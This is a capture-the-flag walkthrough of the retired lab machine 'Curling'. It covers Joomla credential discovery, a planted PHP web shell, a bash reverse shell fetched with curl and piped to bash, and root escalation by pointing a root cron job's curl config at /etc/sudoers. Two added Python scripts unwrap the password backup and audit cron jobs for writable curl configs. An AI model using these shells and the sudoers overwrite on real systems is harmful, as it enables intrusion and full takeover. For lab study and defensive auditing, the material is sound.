Curling

This is the write-up for the box Curling, which was retired on 30 March 2019. My IP address was 10.10.14.24 while I did this.

Let's put this in our hosts file:

10.10.10.150    curling.htb

Enumeration

Starting with a Nmap scan:

nmap -sC -sV -o nmap/curling.nmap 10.10.10.150
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking HTTP (Port 80)

On the web page is a blog with the title "Cewl Curling Site" that runs on Joomla and there is a login form on the right side.

The article with the title "My first post of curling in 2018" is signed by Floris and the header says "Written by Super User" so those could be potential usernames. The blog title could be a hint to use the custom wordlist generator tool CeWL to search for potential credentials.

Such a custom wordlist can be generated with CeWL:

cewl -w curling_cewl.txt 10.10.10.150

When looking at the HTML source of the homepage, there is a comment on the last line that mentions secret.txt. The file is accessible by browsing to it:

http://10.10.10.150/secret.txt

The content is one string:

Q3VybGluZzIwMTgh

When Base64-decoded, this string looks like a password:

echo 'Q3VybGluZzIwMTgh' | base64 -d

Curling2018!

Logging in with the username floris and this password succeeds. These credentials also work on the Joomla backend at /administrator.

Getting command execution

To get command execution on Joomla and start a reverse shell, we modify a template or create a new template file that contains PHP code.

Extensions --> Templates --> Templates --> Protostar Details and Files --> New File

Content of own PHP file (shell.php):

<?php system($_REQUEST['cmd']); ?>

This file can be found in /templates/protostar/shell.php and it is possible to execute commands:

http://10.10.10.150/templates/protostar/shell.php?cmd=whoami

The output of the whoami command is www-data. Let's start a reverse shell on the box by creating a bash script that the box downloads and executes:

Creating shell.sh

bash -i >& /dev/tcp/10.10.14.24/9001 0>&1

Downloading and executing file:

http://10.10.10.150/templates/protostar/shell.php?cmd=curl%2010.10.14.24/shell.sh%20|%20bash

After sending this request, the listener on my IP and port 9001 starts a reverse shell session as www-data.

Privilege Escalation

In the home directory /home/floris is a file called password_backup. This file is in hexdump format, which can be reversed with xxd -r:

xxd -r password_backup > password_backup.1

The result is not human-readable, and file password_backup.1 shows that it is bzip2-compressed data:

bzcat password_backup.1 > password_backup.2

It is still not readable, and file password_backup.2 shows that it is gzip-compressed data:

zcat password_backup.2 > password_backup.3

It is still not readable, and file password_backup.3 shows that it is bzip2-compressed data again, so bzcat (not zcat) is needed for this layer:

bzcat password_backup.3 > password_backup.4

It is now almost readable, and file password_backup.4 shows that it is a POSIX tar archive:

tar -xvf password_backup.4

It extracts the file password.txt with the following content:

5d<wdCbdZu)|hChXll

TIP: All of this can also be automated with CyberChef and here is the recipe for this case.
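The unwrapping chain above (xxd -r, bzcat, zcat, bzcat, tar) done in one place, as an added example that is not part of the original write-up: the hexdump parser, a magic-byte driven decompressor that handles bzip2 and gzip layers in any order (more general than the fixed sequence on the box), and a constructed sample built the same way as password_backup so it runs offline. The function and file names are my own.

```python
import bz2, gzip, io, tarfile
def xxd_reverse(text):
    """Equivalent of `xxd -r`: keep the hex columns, drop offset and ASCII column."""
    out = bytearray()
    for line in text.splitlines():
        if ":" not in line:
            continue
        hexpart = line.split(":", 1)[1].split("  ", 1)[0]  # two spaces start the ASCII column
        out += bytes.fromhex(hexpart.replace(" ", ""))
    return bytes(out)

def xxd_dump(data):
    """xxd-style hexdump writer, used only to build the constructed sample."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hx = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hx:<39}  {asc}")
    return "\n".join(lines) + "\n"

def unwrap(data, max_layers=10):
    """Peel bzip2/gzip layers by magic bytes, in whatever order they were applied."""
    layers = []
    for _ in range(max_layers):
        if data.startswith(b"BZh"):
            data, kind = bz2.decompress(data), "bzip2"
        elif data.startswith(b"\x1f\x8b"):
            data, kind = gzip.decompress(data), "gzip"
        else:
            break
        layers.append(kind)
    return layers, data

def recover_password(hexdump_text, member="password.txt"):
    """xxd -r, then decompress, then read one tar member. Returns (layers, bytes)."""
    layers, payload = unwrap(xxd_reverse(hexdump_text))
    if payload[257:262] != b"ustar":  # not a tar archive: hand back whatever came out
        return layers, payload
    with tarfile.open(fileobj=io.BytesIO(payload), mode="r:") as tf:
        return layers, tf.extractfile(member).read()

def build_sample(secret):
    """Constructed stand-in for password_backup: tar -> bzip2 -> gzip -> bzip2 -> xxd."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    return xxd_dump(bz2.compress(gzip.compress(bz2.compress(buf.getvalue()))))
```

Running recover_password(build_sample(b"...")) returns the layer list ["bzip2", "gzip", "bzip2"] alongside the member's bytes, which is exactly the order the manual commands above had to follow.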

As the content doesn't look like any kind of encoding, use it as-is as the SSH password for floris:

ssh floris@10.10.10.150

Privilege Escalation to root

In the home directory /home/floris is a directory admin-area with two files:

  • report
  • input

The file report contains the HTML source of the initial web page, and input contains a single line:

url = "http://127.0.0.1"

Let's change this to point at our own host and check whether it tries to connect to us:

url = "http://10.10.14.24/test"

After a while it connects to our host, rewrites report with the result of the (failed) request, and restores input to its original state. This is probably a curl command, and with that information it is also possible to read local files:

url = "file:///etc/passwd"

This writes the contents of /etc/passwd into the report file. As this is most likely a cron job, it is possible to read the crontab of root:

url = "file:///var/spool/cron/crontabs/root"

After the next cycle, it shows the results:

* * * * * curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

TIP: The report file can be continuously checked with watch -n 1 cat report, as it gets rewritten every minute.

In curl, the -K parameter reads options from a configuration file, so we can change that configuration so that curl downloads a file from our host and overwrites a sensitive file on the box, such as the sudoers file.

Modifying input:

url = "http://10.10.14.24/sudoers"
output = "/etc/sudoers"
user-agent = "whateveragent/1.0"

This will download my sudoers file, which grants floris full sudo rights, and overwrite /etc/sudoers on the box:

root    ALL=(ALL:ALL) ALL
floris  ALL=(ALL:ALL) ALL

Now it is possible to become root with sudo su - and the password of floris!
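From the defender's side, the root cause here is a root cron job reading a curl config file (the -K argument) from a directory a normal user owns. The following audit script, an added example that is not part of the original write-up, parses a root crontab for curl -K/--config jobs and flags any whose config file or parent directory is owned by a non-root uid or is group/world writable. The crontab text and the ownership data are constructed so it runs offline; function names are my own.

```python
import os, shlex, stat
from collections import namedtuple
Stat = namedtuple("Stat", "st_uid st_mode")  # stand-in for os.stat_result in the offline demo
def curl_config_refs(crontab_text):
    """(schedule, config_path, output_path) for every cron command running curl -K/--config."""
    refs = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank, comment and VAR=value lines; @reboot-style jobs are not handled
        schedule, argv = " ".join(fields[:5]), shlex.split(fields[5])
        if not argv or os.path.basename(argv[0]) != "curl":
            continue
        cfg = out = None
        for opt, val in zip(argv, argv[1:]):
            if opt in ("-K", "--config"):
                cfg = val
            elif opt in ("-o", "--output"):
                out = val
        if cfg:
            refs.append((schedule, cfg, out))
    return refs
def writable_by_untrusted(st, trusted_uids=(0,)):
    """True if a non-trusted uid owns the path or it is group/world writable."""
    return st.st_uid not in trusted_uids or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
def audit_root_crontab(crontab_text, stat_fn=os.stat):
    """Flag root jobs whose curl config file or its directory is modifiable by non-root:
    the writer can set 'output = /etc/sudoers' and have root's curl overwrite it."""
    findings = []
    for schedule, cfg, out in curl_config_refs(crontab_text):
        for path in (cfg, os.path.dirname(cfg)):
            try:
                st = stat_fn(path)
            except (OSError, KeyError):  # missing path: nothing to check here
                continue
            if writable_by_untrusted(st):
                findings.append(f"{path} (uid {st.st_uid}) controls root job '{schedule}' writing {out}")
                break
    return findings

# Constructed sample crontab and ownership data (not taken from the box).
SAMPLE_CRONTAB = """MAILTO=root
*/10 * * * * /usr/bin/curl -K /etc/curlrc -o /var/tmp/health
* * * * * curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
"""
SAMPLE_FS = {"/etc": Stat(0, 0o40755), "/etc/curlrc": Stat(0, 0o100644),
             "/home/floris/admin-area": Stat(1000, 0o40755),
             "/home/floris/admin-area/input": Stat(1000, 0o100644)}
```

On a live host, call audit_root_crontab(open("/var/spool/cron/crontabs/root").read()) as root with the default os.stat; with the sample data only the admin-area job is reported, the /etc/curlrc job is not.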